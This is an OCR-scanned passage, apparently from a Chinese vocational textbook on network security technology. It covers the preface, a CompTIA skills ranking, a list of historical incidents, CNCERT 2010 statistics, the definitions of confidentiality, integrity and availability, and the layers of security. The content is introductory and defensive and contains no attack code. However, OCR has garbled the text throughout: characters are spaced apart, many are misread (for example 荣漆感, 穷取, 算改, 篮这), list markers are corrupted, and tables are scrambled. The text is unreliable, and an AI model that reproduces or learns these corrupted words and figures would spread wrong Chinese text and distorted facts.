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从 1999 年 开始 ,高 等 学 校 连续 进行 了 十 几 年 的 大 规模 扩招 ,大 学 教育 
也 开始 由 精英 教育 转 为 大 众 化 教育 。 随 着 教学 对 象 .教学 目标 和 教学 环境 
的 转变 ,传统 的 教学 内 容 、 教 学 方法 和 教学 手段 已 不 再 适合 高 职 教育 的 
需要 。 

计算 机 网 络 的 出 现 改变 了 人 们 使 用 计算 机 的 方式 ,也 改变 了 人 们 的 学 
习 \ 工 作 和 生活 方式 。 计 算 机 网 络 给 和 人们 带 来 便利 的 同时 ,也 带 来 了 保证 网 
络 安全 的 巨大 挑战 。 据 媒体 统计 ,截至 2012 年 3 月 底 , 我 国 网 民 规模 已 达 
到 5.27 亿 人 ,互联 网 普及 率 为 39.4%。 有 52% 的 网 民 曾 遭遇 过 网 络 安全 
事件 ,有 21.2% 的 网 民 曾 遭 受 直接 经 济 损失 ,有 4.4% 的 网 民 个 人 计算 机 未 
安装 任何 安全 软件 ,不 足 8% 的 手机 网 民 安 装 手机 安全 防护 软件 ,这 些 进 一 
步 说 明 , 普 及 全 民 的 网 络 安全 意识 仍然 任重道远 。 

“网 络 安全 技术 ”已 成 为 高 职 院 校 计算 机 及 相关 专业 的 重要 必修 课程 。 
本 书 根据 高 等 职业 教育 的 特点 ,基于 “项 目 引导 、 任 务 驱动 ”的 项 目 化 教学 方 
式 编写 而 成 ,体现 “基于 工作 过 程 ”“ 教 学、 做 ”一 体 化 的 教学 理念 ,将 全 书 
内 容 划 分 为 11 个 工程 项 目 , 具 体内 容 包 括 :认识 计算 机 网 络 安全 技术 、 
Windows 系统 安全 加 固 、 网 络 协议 与 分 析 、 计 算 机 病毒 及 防治 、 密 码 技术 、 网 
络 攻 击 与 防范 、 防 火 墙 技术 、 入 侵 检 测 技 术 、VPN 技术 、Web 安全 无 线 网 络 
安全 。 本 书 具有 以 下 特点 。 

(1) 体现 “项目 引 导 、 任 务 驱动 教学 特点 。 从 实际 应 用 出 发 ,从 工作 过 
程 出 发 ,从 项 目 出 发 .采用 “项 目 引导 、 任 务 驱 动 ”的 方式 ,通过 “提出 问题 ”一 
“分 析 问 题 ” 一 “解决 问题 >“ 拓展 提高 ”四 部 曲 展开 。 在 宏观 教学 设计 上 突 
破 以 知识 点 的 层次 递 进 为 理论 体系 的 传统 模式 ,将 职业 工作 过 程 系统 化 ,以 
工作 过 程 为 参照 系 , 按 照 工 作 过 程 来 组 织 和 讲解 知识 ,培养 学 生 的 职业 技能 
和 职业 素养 。 

(2) 体现 “ 教 , 学 、 做 ”一 体 化 的 教学 理念 。 以 学 到 实用 技能 、 提 高 职业 
能 力 为 出 发 点 ,以 “做 ”为 中 心 ,“ 教 "和 "学 ”都 围绕 着 “做 ”, 在 学 中 做 ,在 做 中 
学 ,从 而 完成 知识 学 习 ,技能 训练 和 提高 职业 素养 的 教学 目标 。 

(3) 本 书 体例 采用 项 目 、 任 务 形式 。 全书 设 有 11 个 工程 项 目 , 每 一 个 项 
目 再 明确 若干 任务 。 教 学 内 容 安 排 由 易 到 难 、 由 简单 到 复杂 ,层次 推进 , 循 
序 渐进 。 学 生 能 够 通过 项 目 学 习 , 完 成 相关 知识 的 学 习 和 技能 的 训练 。 每 
个 项 目 来 自 企 业 工 程 实践 .具有 典型 性 和 实用 性 。 
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(4) 项 目 /任务 的 内 容 体现 趣味 性 .实用 性 和 可 操作 性 。 趣 味 性 使 学 生 始 终 保持 较 高 的 
学 习 兴 趣 和 动力 ;实用 性 使 学 生 能 学 以 致 用 ;可 操作 性 保证 每 个 项 目 /任务 能 顺利 完成 。 本 
书 的 讲解 力求 贴近 口语 ,让 学 生 感 到 易学 、 乐 学 ,在 宽松 环境 中 理解 知识 、 掌 握 技 能 。 

(5) 紧 跟 行业 技术 发 展 。 网 络 安 全 技术 发 展 很 快 ,本 书 着 力 于 当前 主流 技术 和 新 技术 
的 讲解 ,与 行业 联系 密切 ,使 所 有 内 容 紧 跟 行 业 技术 的 发 展 。 

(6) 符合 高 职 学 生 认 知 规律 ,有 助 于 实现 有 效 教学 ,提高 教学 的 效率 、 效 益 、 效 果 。 本 书 
打破 传统 的 学 科 体 系 结构 ,将 各 知识 点 与 操作 技能 恰当 地 融入 各 个 项 目 / 任 务 中 ,突出 现代 
职业 教育 的 职业 性 和 实践 性 ,强化 实践 ,培养 学 生 实践 动手 能 力 ,适合 高 职 学 生 的 学 习 特 点 ， 
在 教学 过 程 中 注意 情感 交流 ,因材施教 ,调动 学 生 的 学 习 积 极 性 ,提高 教学 效果 。 

(7) 本 书 中 相关 任务 操作 对 实验 环境 的 要 求 比较 低 , 采 用 常见 的 设备 和 软件 即 可 完成 ， 
便于 实施 。 为 了 方便 操作 和 保护 系统 安全 ,本 书 中 的 大 部 分 任务 操作 均 可 在 Windows 
Server 2003 虚拟 机 中 完成 ,部 分 任务 操作 要 在 Windows Server 2000 虚拟 机 中 完成 ,所 用 的 
工具 软件 均 可 在 互联 网 上 下 载 。 

本 书 由 黄 林 国 、 章 仪 任 主编 ,其 中 项 目 1 一 项 目 10 由 黄 林 国 编写 ,项 目 11 由 章 仪 编写 ， 
全 书 由 黄 林 国 统 稿 。 参 加 编写 的 还 有 类 淑敏 、 曾 希 君 . 王 振 邦 、 叶 敏 、 凌 代 红 、 张 丽 君 、 黄 倩 、 
陈 伟 钱 、 张 瑛 \ 叶 婉 秋 、 王 亚 君 、 李 育 喜 等 。 在 编写 过 程 中 ,参考 了 大 量 的 书籍 和 互联 网 上 的 
资料 ,在 此 ,并 向 这 些 书籍 和 资料 的 作者 表示 感谢 。 

为 了 便于 教学 ,本 书 提供 的 PPT 课件 等 教学 资源 可 以 从 清华 大 学 出 版 社 网 站 (http:// 
www. tup. com. cn) 的 下 载 区 免费 下 载 。 

由 于 编者 水 平 有 限 , 书 中 难免 存在 不 当 和 朴 漏 之 处 , 敬 请 读者 批评 指正 。 联 系 方式 
huanglgvip@21 cn. com。 
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11 项 目 提 出 


据 国 外 媒体 报道 ,全 球 计算 机 行业 协会 (CompTIA) 近日 评 出 了 “全 球 最 急需 的 10 项 
IT 技术 ”, 结 果 安 全 和 防火 墙 技 术 排 名 首位 。 

据 CompTIA 近日 公布 的 (全 球 IT 技术 状况 ) 报 告 显示 ,安全 /防火 墙 /数据 隐私 类 技术 
排名 首位 ,而 网 络 技术 位 居 第 二 。 

全 球 最 急需 的 10 项 IT 技术 : 

(1) 安全 /防火 墙 /数据 隐私 类 技术 。 

(2) 网 络 / 网 络 基础 设施 。 

(3) 操作 系统 。 

(4) 硬件 。 

(5) 非特 定性 服务 器 技术 。 

(6) 软件 。 

(7) 应 用 层面 技术 。 

(8) 特定 编程 语言 。 

(9) Web 技术 。 

(10) RF 移动 /无 线 技术 。 

由 上 可 见 ,排名 第 一 的 就 是 安全 问题 ,这 说 明 安全 方面 的 问题 是 全 世界 都 吸 须 解决 的 问 
题 , 可 想 而 知 我 们 所 面临 的 网 络 安全 状况 有 多 篮 这 。 


12 项 目 分 析 


计算 机 网 络 近年 来 得 到 了 飞速 的 发 展 , 在 网 络 高 速 发 展 的 过 程 中 ,网 络 技术 的 日 趋 成 熟 
使 得 网 络 连接 更 加 容易 .人 们 在 享受 网 络 带 来 便利 的 同时 .网络 的 安全 也 日 益 受 到 威胁 。 

互联 网 和 网 络 应 用 以 飞快 的 速度 不 断 发 展 , 网 络 应 用 日 益 普 及 并 更 加 复杂 ,网 络 安全 问 
题 是 互联 网 和 网 络 应 用 发 展 中 面临 的 重要 问题 。 网 络 攻击 行为 日 趋 复杂 ,各 种 方法 相互 融 
合 . 使 网 络 安全 防御 更 加 困难 。 黑 客 攻 击 行为 组 织 性 更 强 . 攻 击 日 标 从 单纯 地 追求 “ 荣 漆 感 ” 
向 获取 多 方面 实际 利益 的 方向 转移 ,网 上 木马 .间谍 程序 .恶意 网 站 、 网 络 仿冒 等 的 出 现 和 日 
趋 泛 滥 ; 智 能 手机 ,平板 计算 机 等 无 线 终端 的 处 理 能 力 和 功能 通用 性 提高 .使 其 日 趋 接近 个 
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人 计算 机 ,针对 这 些 无 线 终端 的 网 络 攻击 已 经 开始 出 现 .并 将 进一步 发 展 。 

总 之 ,网 络 安全 问题 变 得 更 加 错综复杂 ,影响 将 不 断 扩 大 ,很 难 在 短期 内 得 到 全 面 解 决 。 
安全 问题 已 经 摆 在 了 非常 重要 的 位 置 上 ,网 络 安全 如 果 不 加 以 防范 ,会 严重 影响 网 络 的 
应 用 。 


13 相关 知识 点 


1.3.1 网 络 安 全 概述 


1. 网 络 安全 的 重要 性 


尽管 网 络 的 重要 性 已 经 被 广泛 认同 ,但 对 网 络 安全 的 忽视 仍 很 普遍 ,缺乏 网 络 安全 意识 
的 状况 仍然 十 分 严峻 。 不 少 企 事业 单位 极为 重视 网 络 硬件 的 投资 ,但 没有 意识 到 网 络 安全 
的 重要 性 ,对 网 络 安全 的 投资 较 音 畜 。 这 也 使 得 日 前 不 少 网 络 信 息 系统 都 存在 先天 性 的 安 
全 漏洞 和 安全 威胁 ,有 些 甚 至 产生 了 非常 严重 的 后 果 。 下 面 是 近年 来 发 生 的 一 些 重大 网 络 
信息 安全 事件 。 

1995 年 , 米 特 尼 克 奖 入 许多 计算 机 网 络 , 穷 取 了 两 万 个 信用 卡号 ,他 曾 交 入 “北美 空中 
防务 指挥 系统 ”, 破 译 了 美国 著名 的 “太平 洋 电话 公司 ”在 南 加 利 福 尼 亚 州 通信 和 网络 的 “ 改 户 
密码 ”, 和 人 侵 过 美国 DEC 等 5 家 大 公司 的 网 络 ,造成 8000 万 美元 的 损失 。 

1999 年 ,台湾 大 学 生 陈 盈 豪 制造 的 CIH 病毒 在 4 月 26 日 发 作 . 引 起 全 球 震 撼 , 有 6 千 
多 万 台 计 算 机 受到 伤害 。 

2002 年 ,黑客 用 DDos 攻击 影响 了 13 个 根 DNS 中 的 8 个 ,作为 整个 Internet 通信 路 标 
的 关键 系统 遭 到 严重 的 破坏 。 

2006 年 “熊猫 烧香 "木马 致使 我 国 数 百 万 计算 机 用 户 受 到 感染 ,并 波及 周边 国家 。 
2007 年 2 月 “熊猫 烧香 ”制作 者 李 俊 被 捕 。 

2008 年 ,一 个 全 球 性 的 黑客 组 织 利 用 ATM 欺诈 程序 在 一 夜 之 间 从 世界 49 个 城市 的 
银行 中 咨 走 了 900 万 美元 。 

2009 年 ,韩国 遭受 有 史 以 来 最 猛烈 的 一 次 黑客 攻击 。 韩 国 总 统 府 、 国 会 .国情 院 和 国防 
部 等 国家 机 关 , 以 及 金融 界 、 媒 体 和 防火 墙 企业 网 站 遭受 攻击 .造成 网 站 一 度 无 法 访问 。 

2010 年 ,“ 维 基 解 密 ” 网 站 在 《纽约 时 报 》《 卫 报 》 和 《 镜 报 ) 配 合 下 ,在 网 上 公开 了 多 达 
9. 2 万 份 的 驻 阿 美军 秘密 文件 ,引起 轩然大波 。 

2011 年 , 堪 称 中 国 互 联网 史上 最 大 泄密 事件 发 生 。12 月 中 旬 ,CSDN 网 站 用 户 数 据 库 
被 黑客 在 网 上 公开 ,大 约 600 万 个 注册 邮箱 账号 和 与 之 对 应 的 明文 密码 泄露 。2012 年 1 月 
12 日 .CSDN 泄密 的 两 名 嫌疑 人 已 被 刑事 拘留 。 其 中 一 名 为 北京 籍 黑客 , 另 一 名 为 外 地 
黑客 。 

以 上 仅仅 是 一 些 个案 ,事实 上 ,这样 的 案例 不 胜 枚 举 , 而 且 计算 机 犯罪 案件 有 和 逐年 增加 
的 趋势 。 据 美国 的 一 项 研究 显示 ,全球 互联 网 每 39 秒 就 发 生 了 一 次 黑客 事件 ,其 中 大 部 分 
要 
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黑客 没有 固定 的 目标 。 

因此 ,网 络 系统 必须 有 足够 强大 的 安全 体系 .无 论 是 局 域 网 还 是 广域网 ,无 论 是 单位 还 
是 个 人 ,网 络 安全 的 日 标 是 全 方位 防范 各 种 威胁 以 确保 网 络 信息 的 保密 性 、 完 整 性 和 可 
用 性 。 


2. 网 络 安全 的 现状 


现今 Internet 环境 正在 发 生 着 一 系列 的 变化 ,安全 问题 也 出 现 了 相应 的 变化 ,主要 反映 
在 以 下 几 个 方面 。 

(1) 网 络 犯罪 成 为 集团 化 .产业 化 的 趋势 。 从 灰 铝 子 病毒 案例 可 以 看 出 ,木马 从 制作 到 
最 终 盗 取 用 户 信息 甚至 财物 ,渐渐 成 为 一 条 产业 链 。 

(2) 无 线 网 络 ,智能 手机 成 为 新 的 攻击 区 域 , 新 的 攻击 重点 。 随 着 无 线 网 络 的 大 力 推 
广 ,3G 网 络 使 用 人 群 的 增多 ,使 用 的 用 户 群 体 也 在 不 断 地 增加 ,手机 病毒 .手机 恶意 软件 呈 
现 快 速 增长 的 趋势 。 

(3) 垃圾 邮件 依然 比较 严重 。 虽 然 经 过 这 么 多 年 的 垃圾 邮件 整治 ,垃圾 邮件 现象 得 到 
明显 改善 ,例如 美国 有 相应 的 立法 来 处 理 垃圾 邮件 ,但 是 在 利益 的 驱使 下 ,垃圾 邮件 仍然 影 
响 着 每 个 人 的 邮箱 使 用 。 

(4) 漏洞 攻击 的 爆发 时 间 变 短 。 从 这 几 年 发 生 的 攻击 来 看 ,不 难 发 现 漏洞 攻击 的 时 间 
越 来 越 短 ,系统 漏洞 、 网 络 漏洞 .软件 漏洞 等 被 攻击 者 发 现 并 利用 的 时 间 间 隔 在 不 断 地 缩短 ， 
很 多 攻击 者 都 是 通过 这 些 漏 洞 来 攻击 网 络 的 。 

(5) 攻击 方 的 技术 水 平 要 求 越 来 越 低 。 现 在 有 很 多 黑客 网 站 免费 提供 了 许多 攻击 工 
具 , 利 用 这 些 工具 可 以 很 容易 地 实施 网 络 攻击 。 

(6) Dos(Deny of Service) 攻 击 更 加 频繁 。 由 于 Dos 攻击 更 加 隐蔽 ,难以 追踪 到 攻击 
者 ,大 多 数 攻 击 者 采用 分 布 式 的 攻击 方式 和 跳板 攻击 方法 ,这 种 攻击 更 具有 威胁 性 ,攻击 更 
加 难以 防范 。 

(7) 针对 浏览 器 插件 的 攻击 。 插 件 的 性 能 不 是 由 浏览 器 来 决定 的 ,浏览 器 的 漏洞 升级 
并 不 能 解决 插件 可 能 存在 的 漏洞 。 

(8) 网 站 攻击 ,特别 是 网 页 被 挂 木马 。 大 多 数 用 户 在 打开 一 个 熟悉 的 网 站 ,比如 自己 信 
任 的 网 站 ,但 是 这 个 网 站 被 挂 木马 ,在 不 经 意 间 木马 将 会 安装 在 自己 的 计算 机 中 ,这 是 现在 
网 站 攻击 的 主要 模式 。 

(9) 内 部 用 户 的 攻击 。 现 今 企 事业 单 位 的 内 部 网 与 外 部 网 的 联系 越 来 越 紧 密 , 来 自 内 
部 用 户 的 威胁 也 不 断 地 表现 出 来 。 来 自 内 部 攻击 的 比例 在 不 断 上 升 , 变 成 内 部 网 络 的 一 个 

据 我 国 国家 计算 机 网 络 应 急 技 术 处 理 协调 中 心 (简称 CNCERT/CC) 统 计 ,2010 年 ， 
CNCERT 共处 理 各 类 网 络 安全 事件 3236 件 , 较 2009 年 的 1176 件 增长 了 175%。 
CNCERT 处 理 的 网 络 安全 事件 的 类 型 构成 如 图 1-1 所 示人 .主要 有 漏洞 .恶意 代 码 、 网 
页 挂 马 等 。 


四 来自 CNCERTVCC 2010 年 中 国 互联 网 络 安全 报告 。 
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2010 年 CNCERT 接 收 到 网 络 安全 事件 类 型 分 布 


网 页 挂 马 其 他 
21. 35% 0.04% 恶意 代码 
29. 61% 


拒绝 服务 攻击 。 网 页 仿冒 
0. 95% 15. 01% 


图 1-1 2010 年 CNCERT 接收 到 网 络 安全 事件 类 型 分 布 


3. 网 络 安全 的 定义 


网 络 安全 是 指 计 算 机 及 其 网 络 系统 资源 和 信息 资源 不 受 自然 与 人 为 有 害 因素 的 威胁 和 
危害 , 即 是 指 计算 机 、 网 络 系统 的 硬件 和 软件 及 其 系统 中 的 数据 受到 保护 ,不 因 偶然 的 或 者 
恶意 的 原因 而 遭 到 破坏 、 更 改 、 泄 露 , 确 保 系统 能 连续 可 靠 正 常 地 运行 ,使 网 络 服务 不 中 断 。 

计算 机 网 络 安全 从 其 本 质 上 来 讲 就 是 系统 上 的 信息 安全 。 计 算 机 网 络 安全 是 一 门 涉 及 
计算 机 科学 、 网 络 技术 .密码 技术 、 信 息 安全 技术 .应 用 数学 .数论 .信息 论 等 多 种 学 科 的 综合 
性 科学 。 

从 广义 来 说 ,凡是 涉及 计算 机 网 络 上 信息 的 保密 性 、 完 整 性 、 可 用 性 、 可 控 性 和 不 可 否认 
性 的 相关 技术 和 理论 都 是 计算 机 网 络 安 全 的 研究 领域 。 

(1) 保密 性 

保密 性 是 指 网 络 信息 不 被 泄露 给 非 授 权 的 用 户 或 过 程 , 即 信息 只 为 授权 用 户 使 用 。 即 
使 非 授 权 用 户 得 到 信息 也 无 法 知晓 信息 的 内 容 , 因 而 不 能 使 用 。 

(2) 完整 性 

完整 性 是 指 维 护 信 息 的 一 致 性 , 即 在 信息 生成 传输、 存储 和 使 用 过 程 中 不 发 生 人 为 或 
非 人 为 的 非 授权 算 改 。 

(3) 可 用 性 

可 用 性 是 指 授权 用 户 在 需要 时 能 不 受 其 他 因素 的 影响 ,方便 地 使 用 所 需 信 息 , 即 当 需 要 
时 能 否 存 取 所 需 的 信息 。 例 如 ,网 络 环境 下 拒绝 服务 破坏 网 络 和 有 关系 统 的 正常 运行 等 都 
属于 对 可 用 性 的 攻击 。 

(4) 可 控 性 

可 控 性 是 指 对 网 络 系统 中 的 信息 传播 及 具体 内 容 能 够 实现 有 效 控制 , 即 网 络 系统 中 的 
任何 信息 要 在 一 定 传输 范围 和 存放 空间 内 可 控 。 

(5) 不 可 否认 性 

不 可 否认 性 是 指 保 障 用 户 无 法 在 事后 否认 曾经 对 信息 进行 的 生成 、 签 发 .接收 等 行为 ， 
一 般 通 过 数字 签名 来 提供 不 可 否认 服务 。 

从 网 络 运行 和 管理 者 角度 来 说 ,他 们 和 希望 对 本 地 网 络 信息 的 访问 . 读 / 写 等 操作 受到 保 
护 和 控制 ,避免 出 现 * 陷 门 ” 病 毒 . 非 法 存 取 拒绝 服务 和 网 络 资源 非法 占用 和 非法 控制 等 威 
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胁 ,制止 和 防御 网 络 黑客 的 攻击 。 对 安全 保密 部 门 来 说 ,它们 希望 对 非法 的 .有害 的 或 涉及 
国家 机 密 的 信息 进行 过 滤 和 防 堵 , 避 免 机 要 信息 泄露 ,避免 对 社会 产生 危害 ,对 国家 造成 巨 
大 损失 。 从 社会 教育 和 意识 形态 角度 来 讲 , 网 络 上 不 健康 的 内 容 会 对 社会 的 稳定 和 人 类 的 
发 展 造成 阻碍 ,必须 对 其 进行 控制 。 

网 络 安全 问题 ,应 该 像 每 家 每 户 的 防火 、 防 次 问题 一 样 ,做 到 防 患 于 未 然 。 甚 至 不 会 想到 
自己 也 会 成 为 日 标的 时 候 ,威胁 就 已 经 出 现 了 .一 旦 发 生 .常常 措手不及 ,造成 极 大 的 损失 。 


4. 网 络 安全 的 主要 威胁 


网 络 系统 的 安全 威胁 主要 表现 在 主机 可 能 会 受到 非法 入 侵 者 的 攻击 ,网 络 中 的 敏感 数 
据 有 可 能 泄露 或 被 修改 ,从 内 部 网 向 公共 网 传送 的 信息 可 能 被 他 人 窃听 算 改 等 。 典 型 的 网 
络 安全 威胁 如 表 1-1 所 示 。 


表 1-1 典型 的 网 络 安全 威胁 


威 胁 省 芝 
窃听 网 络 中 传输 的 敏感 信息 被 窃听 
重 传 攻击 者 事先 获得 部 分 或 全 部 信息 ,以 后 将 此 信息 发 送 给 接收 者 
伪造 攻击 者 将 伪造 的 信息 发 送 给 接收 者 
自 改 攻击 者 对 合法 用 户 之 间 的 通信 信息 进行 修改 、 删 除 、 持 入 ,再 发 送 给 接收 者 


通过 假冒 、 身 份 攻击 、 系 统 漏洞 等 手段 获取 系统 访问 权 , 从 而 使 非法 用 户 进入 


人 网 络 系统 读 取 、 删 除 .修改 .插入 信息 等 

拒绝 服务 访问 攻击 者 通过 某 种 方法 使 系统 响应 减 慢 甚至 瘫痪 ,阻止 合法 用 户 获 得 服务 
行为 否认 通信 实体 否认 已 经 发 生 的 行为 

旁 路 控制 攻击 者 发 气 系 统 的 缺陷 或 安全 脆弱 性 

电磁 /射频 截获 攻击 者 从 电子 或 机 电 设备 所 发 出 的 无 线 射频 或 其 他 电磁 辐射 中 提取 信息 
人 员 朴 忽 已 授权 人 为 了 自己 的 利益 或 由 于 粗心 将 信息 泄露 给 未 授权 人 


5. 影响 网 络 安全 的 主要 因素 


影响 网 络 安全 的 因素 有 很 多 ,归纳 起 来 主要 有 以 下 一 些 因素 。 

(1) 开放 性 的 网 络 环境 

网 络 特点 正如 一 句 非常 经 典 的 话 所 描述 的 :Internet 的 美妙 之 处 在 于 你 和 每 个 人 都 能 
互相 连接 ,Internet 的 可 怕 之 处 在 于 每 个 人 都 能 和 你 互相 连接 。” 

Internet 是 一 个 开放 性 的 网 络 . 是 跨越 国界 的 .这 意味 着 网 络 的 攻击 不 仅 来 自 本 地 网 络 
的 用 户 ,也 可 以 来 自 Internet 上 的 任何 一 台 机 器 。Internet 是 一 个 虚拟 的 世界 ,无 法 得 知 联 
机 的 另 一 端 是 谁 。 在 这 个 虚拟 的 世界 里 ,已 经 超越 了 国界 ,. 某 些 法 律 也 受到 了 挑战 ,因此 网 
络 安全 面临 的 是 一 个 国际 化 的 挑战 。 

网 络 建立 初期 只 考虑 方便 性 、 开 放 性 ,并 没有 考虑 总 体 安全 构架 ,任何 一 个 人 或 者 团体 

5 


网 络 安全 技术 项 目 化 教程 


都 可 能 接 入 ,因而 网 络 所 面临 的 破坏 和 攻击 可 能 是 多 方面 的 。 例 如 ,可 能 是 对 物理 传输 线路 
的 攻击 ,可 能 是 对 操作 系统 漏洞 的 攻击 ,可 能 是 对 网 络 通 信 协 议 的 攻击 ,也 可 能 是 对 硬件 的 
攻击 等 。 网 络 安 全 已 成 为 信息 时 代 人 类 共同 面临 的 挑战 。 

(2) 操作 系统 的 漏洞 

漏洞 是 可 以 在 攻击 过 程 中 利用 的 弱点 , 它 可 以 是 软件 、 硬 件 、 程 序 缺 点 .功能 设计 或 者 配 
置 不 当 等 造成 的 。 黑 客 或 人 侵 者 会 研究 分 析 这 些 漏 洞 , 加 以 利用 而 获得 侵入 和 破坏 的 机 会 。 

网 络 连接 离 不 开 网 络 操作 系统 ,操作 系统 可 能 存在 各 种 漏洞 ,有 很 多 网 络 攻 击 的 方法 都 
是 从 寻找 操作 系统 的 漏洞 开始 的 。 

QO@ 系统 模型 本 身 的 漏洞 。 这 是 系统 设计 初期 就 存在 的 ,无 法 通过 修改 操作 系统 程序 的 
源 代 码 来 修补 。 

@ 操作 系统 程序 的 源 代码 存在 漏洞 。 操 作 系统 也 是 一 个 计算 机 程序 .任何 一 个 程序 都 
可 能 存在 漏洞 ,操作 系统 也 不 例外 。 例 如 ,冲击 波 病毒 针对 的 是 Windows 操作 系统 的 RPC 
缓冲 区 溢出 漏洞 。 

@ 操作 系统 程序 配置 不 当 。 许 多 操作 系统 的 默认 配置 的 安全 性 较 差 ,进行 安全 配置 比 
较 复杂 并 且 需 要 一 定 的 安全 知识 ,许多 用 户 并 没有 这 方面 的 能 力 , 如 果 没 有 正确 配置 这 些 安 
全 功能 ,会 造成 一 些 系统 的 安全 缺陷 。 

(3) TCP/IP 协议 的 缺陷 

一 方面 ,该 协议 数据 流 采用 明码 传输 , 且 传 输 过 程 无 法 控制 ,这 就 为 他 人 截取 、 窃 听信 息 
提供 了 机 会 ; 另 一 方面 ,该 协议 在 设计 时 采用 协议 簇 的 基本 体系 结构 ,IP 地 址 作为 网 络 节 点 
的 唯一 标识 ,不 是 固定 的 且 不 需要 身份 认证 。 因 此 攻击 者 就 有 了 可 乘 之 机 ,他 们 可 以 通过 修 
改 或 冒充 他 人 的 IP 地 址 进行 信息 的 拦截 窃取 和 算 改 等 。 

(4) 人 为 因素 

在 计算 机 使 用 过 程 中 ,使 用 者 的 安全 意识 缺乏 、 安 全 管理 措施 不 到 位 等 ,通常 是 网 络 安 
全 的 一 个 重大 隐患 。 例 如 ,隐秘 性 文件 未 设 密 , 操 作 口 令 的 泄露 ,重要 文件 的 丢失 等 都 会 给 
黑客 提供 攻击 的 机 会 。 对 于 系统 漏洞 的 不 及 时 修补 以 及 不 及 时 防 病 毒 都 可 能 会 给 网 络 安全 
带 来 影响 。 


1.3.2 网 络 安全 所 涉及 的 内 容 


网 络 安全 是 一 门 交叉 学 科 , 除 了 涉及 数学 、 通 信 、 计 算 机 等 自然 科学 外 ,还 涉及 法 律 、 心 
理学 等 社会 科学 ,是 一 个 多 领域 的 复杂 系统 。 一 般 的 ,把 网 络 安全 涉及 的 内 容 分 为 物理 安 
全 、 网 络 安全 、 系 统 安全 、 应 用 安全 管理 安全 5 个 方面 .如 图 1-2 所 示 。 


1. 物理 安全 


应 用 安全 

物理 安全 也 称 实体 安全 ,是 指 保护 计算 机 设备 .设施 (网 系统 安全 

络 及 通信 线路 ) 免 遭 地震. 水灾、 火灾 等 自然 灾害 和 环境 事故 | pr 
(如 电磁 污染 等 ), 以 及 人 为 操作 失误 及 计算 机 犯罪 行为 导致 


的 破坏 。 保 证 计算 机 信息 系统 各 种 设备 的 物理 安全 ,是 整个 | ”2 全 | 


计算 机 信息 系统 安全 的 前 提 。 物 理 安 全 主要 包括 以 下 3 个 图 1-2 网 络 安全 所 涉及 的 内 容 
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方面 。 

(1) 环境 安全 :对 系统 所 有 环境 的 安全 保护 :如 区 域 保 护 ( 电 子 监控 ) 和 灾难 保护 (灾难 
的 预警 .应急 处 理 .恢复 等 ) 。 

(2) 设备 安全 :主要 包括 设备 的 防盗 , 防 毁 (接地 保护 ) , 防 电磁 信息 辐射 泄露 .防止 线路 
截获 、 抗 电磁 干扰 及 电源 保护 等 。 

(3) 媒体 安全 :包括 媒体 数据 的 安全 及 媒体 本 身 的 安全 。 


2. 网 络 安全 
网 络 安全 主要 包括 网 络 运行 和 网 络 访问 控制 的 安全 ,如 表 1-2 所 示 。 
表 1-2 网 络 安全 的 组 成 


访问 控制 (防火 墙 ) 
局 域 网 . 子 网 安全 
网 络 安全 检测 (入 侵 检 测 系 统 ) 
网 络 中 数据 传输 安全 数据 加 密 (VPN 等 ) 
网 络 安 全 Ws 备份 与 恢复 
网 络 运 行 安 全 
应 急 
TCP/IP 
网 络 协议 安全 
其 他 协议 


在 网 络 安全 中 ,在 内 部 网 与 外 部 网 之 间 ,可 以 设置 防火 墙 来 实现 内 外 网 的 隔离 和 访问 控 
制 ,是 保护 内 部 网 安全 的 最 主要 的 措施 ,同时 也 是 最 有 效 、 最 经 济 的 措施 之 一 。 网 络 安全 检 
测 工具 通常 是 一 个 网 络 安全 性 的 评估 分 析 软 件 或 硬件 ,用 此 类 工具 可 以 检测 出 系统 的 漏洞 
或 潜在 的 威胁 ,以 达到 增强 网 络 安全 性 的 目的 。 

备份 是 为 了 尽 可 能 快 地 全 面 恢 复 运 行 计算 机 系统 所 需要 的 数据 和 系统 信息 。 备 份 不 仅 
在 网 络 系统 硬件 出 现 故 障 或 人 为 操作 失误 时 起 到 保护 作用 ,也 在 入 侵 者 非 授权 访问 或 对 网 
络 攻击 及 破坏 数据 完整 性 时 起 到 保护 作用 ,同时 也 是 系统 灾难 恢复 的 前 提 之 一 。 


3. 系统 安全 
系统 安全 的 组 成 如 表 1-3 所 示 。 
表 1-3 系统 安全 的 组 成 


反 病毒 


系统 安全 检测 

入 侵 检 测 ( 监 控 ) 
审计 分 析 
数据 库 安全 
数据 库 管 理 系统 安全 


操作 系统 安全 


系统 安全 


数据 库 系统 安全 


人 们 一 般 对 网 络 和 操作 系统 的 安全 很 重视 .而 对 数据 库 的 安全 不 够 重视 ,其 实数 据 库 系 
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统 也 是 一 种 很 重要 的 系统 软件 .与 其 他 软件 一 样 需要 保护 。 
4. 应 用 安全 


应 用 安全 的 组 成 如 表 1-4 所 示 。 
表 1-4 应 用 安全 的 组 成 


各 种 编程 语言 平台 安全 
应 用 软件 开发 平台 安全 
应 用 安全 程序 本 身 的 安全 
应 用 系统 安全 应 用 软件 系统 安全 


应 用 安全 建立 在 系统 平台 之 上 ,人 们 普遍 会 重视 系统 安全 ,而 忽视 应 用 安全 。 主 要 原因 
有 :中 对 应 用 安全 缺乏 认识 ;@ 应 用 系统 过 于 灵活 ,需要 掌握 较 高 的 相关 安全 技术 。 

网 络 安全 、 系 统 安全 和 数据 安全 的 技术 实现 有 很 多 固定 的 规则 ,应 用 安全 则 不 同 , 客 户 
的 应 用 往往 各 不 相同 .必须 投入 相对 更 多 的 人 力 ,物力 ,而 且 没 有 现成 的 工具 ,只 能 根据 经 验 
来 手动 完成 。 

5. 管理 安全 


安全 是 一 个 整体 ,完整 的 安全 解决 方案 不 仅 包括 物理 安全 、 网 络 安全 、 系 统 安 全 和 应 用 
安全 等 技术 手段 ,还 需要 以 人 为 核心 的 策略 和 管理 支持 。 网 络 安全 至 关 重 要 的 往往 不 是 技 
术 手 段 ,而 是 对 人 的 管理 。 无 论 采 用 了 多 么 先进 的 技术 设备 ,只 要 管理 安全 上 有 漏洞 ,那么 
这 个 系统 的 安全 就 没有 保障 。 在 网 络 管理 安全 中 ,专家 们 一 致 认为 是 *30% 的 技术 ,70% 的 
管理 ”。 

同时 ,网 络 安全 不 是 一 个 目标 ,而 是 一 个 过 程 ,而 且 是 一 个 动态 的 过 程 。 这 是 因为 制约 
安全 的 因素 都 是 动态 变化 的 ,必须 通过 一 个 动态 的 过 程 来 保证 安全 。 例 如 , Windows 操作 
系统 经 常 发 布 安全 漏洞 ,在 没有 发 现 系统 漏洞 之 前 ,大 家 可 能 认为 自己 的 系统 是 安全 的 , 实 
